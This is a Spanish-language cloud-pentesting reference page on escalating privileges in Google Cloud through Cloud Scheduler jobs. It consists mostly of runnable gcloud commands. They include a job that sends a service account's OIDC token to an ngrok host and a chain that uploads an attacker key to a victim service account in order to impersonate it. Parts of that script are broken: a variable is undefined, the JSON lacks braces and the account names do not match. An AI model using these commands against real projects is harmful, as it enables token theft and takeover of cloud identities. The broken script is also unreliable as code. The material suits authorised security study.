GCP - Cloud Scheduler Privesc

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Cloud Scheduler

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GCP - Cloud Scheduler Enum

cloudscheduler.jobs.create, iam.serviceAccounts.actAs, (cloudscheduler.locations.list)

Un atacante con estos permisos podría explotar Cloud Scheduler para autenticar trabajos cron como una Cuenta de Servicio específica. Al crear una solicitud HTTP POST, el atacante programa acciones, como crear un bucket de Storage, para ejecutarse bajo la identidad de la Cuenta de Servicio. Este método aprovecha la capacidad del Scheduler para dirigirse a los endpoints *.googleapis.com y autenticar solicitudes, permitiendo al atacante manipular directamente los endpoints de la API de Google utilizando un simple comando gcloud.

  • Contactar cualquier API de google a través de googleapis.com con el encabezado de token OAuth

Crear un nuevo bucket de Storage:

gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://storage.googleapis.com/storage/v1/b?project=<PROJECT-ID>' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com --headers "Content-Type=application/json" --location us-central1

Para escalar privilegios, un atacante simplemente elabora una solicitud HTTP dirigida a la API deseada, suplantando la Cuenta de Servicio especificada

  • Exfiltrar el token de cuenta de servicio OIDC

gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']

# Listen in the ngrok address to get the OIDC token in clear text.

Si necesitas verificar la respuesta HTTP, puedes echar un vistazo a los registros de la ejecución.

cloudscheduler.jobs.update, iam.serviceAccounts.actAs, (cloudscheduler.locations.list)

Al igual que en el escenario anterior, es posible actualizar un programador ya creado para robar el token o realizar acciones. Por ejemplo:

gcloud scheduler jobs update http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']

# Listen in the ngrok address to get the OIDC token in clear text.

Otro ejemplo para subir una clave privada a un SA e impersonarlo:

# Generate local private key
openssl req -x509 -nodes -newkey rsa:2048 -days 365 \
-keyout /tmp/private_key.pem \
-out /tmp/public_key.pem \
-subj "/CN=unused"

# Remove last new line character of the public key
file_size=$(wc -c < /tmp/public_key.pem)
new_size=$((file_size - 1))
truncate -s $new_size /tmp/public_key.pem

# Update scheduler to upload the key to a SA
gcloud scheduler jobs update http scheduler_lab_1 \
--schedule='* * * * *' \
--uri="https://iam.googleapis.com/v1/projects/$PROJECT_ID/serviceAccounts/victim@$PROJECT_ID.iam.gserviceaccount.com/keys:upload?alt=json" \
--message-body="{\"publicKeyData\": \"$(cat /tmp/public_key.pem | base64 -w 0)\"}" \
--update-headers "Content-Type=application/json" \
--location us-central1 \
--oauth-service-account-email privileged@$PROJECT_ID.iam.gserviceaccount.com

# Wait 1 min
sleep 60

# Check the logs to check it worked
gcloud logging read 'resource.type="cloud_scheduler_job" AND resource.labels.job_id="scheduler_lab_1" AND resource.labels.location="us-central1"
jsonPayload.@type="type.googleapis.com/google.cloud.scheduler.logging.AttemptFinished"' --limit 10 --project <project-id> --format=json

## If any  '"status": 200'  it means it worked!
## Note that this scheduler will be executed every minute and after a key has been created, all the other attempts to submit the same key will throw a: "status": 400

# Build the json to contact the SA
## Get privatekey in json format
private_key_json=$(jq -Rn --arg str "$file_content" '$str')

## Get ID of the generated key
gcloud iam service-accounts keys list --iam-account=victim@$PROJECT_ID.iam.gserviceaccount.com

# Create the json in a file
## NOTE that you need to export your project-id in the env var PROJECT_ID
## and that this script is expecting the key ID to be the first one (check the `head`)
export PROJECT_ID=...
cat > /tmp/lab.json <<EOF
"type": "service_account",
"project_id": "$PROJECT_ID",
"private_key_id": "$(gcloud iam service-accounts keys list --iam-account=scheduler-lab-1-target@$PROJECT_ID.iam.gserviceaccount.com | cut -d " " -f 1 | grep -v KEY_ID | head -n 1)",
"private_key": $private_key_json,
"client_email": "scheduler-lab-1-target@$PROJECT_ID.iam.gserviceaccount.com",
"client_id": "$(gcloud iam service-accounts describe scheduler-lab-1-target@$PROJECT_ID.iam.gserviceaccount.com | grep oauth2ClientId | cut -d "'" -f 2)",
"auth_uri": "https://accounts.google.com/o/oauth2/auth",
"token_uri": "https://oauth2.googleapis.com/token",
"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/scheduler-lab-1-target%40$PROJECT_ID.iam.gserviceaccount.com",
"universe_domain": "googleapis.com"

# Activate the generated key
gcloud auth activate-service-account --key-file=/tmp/lab.json


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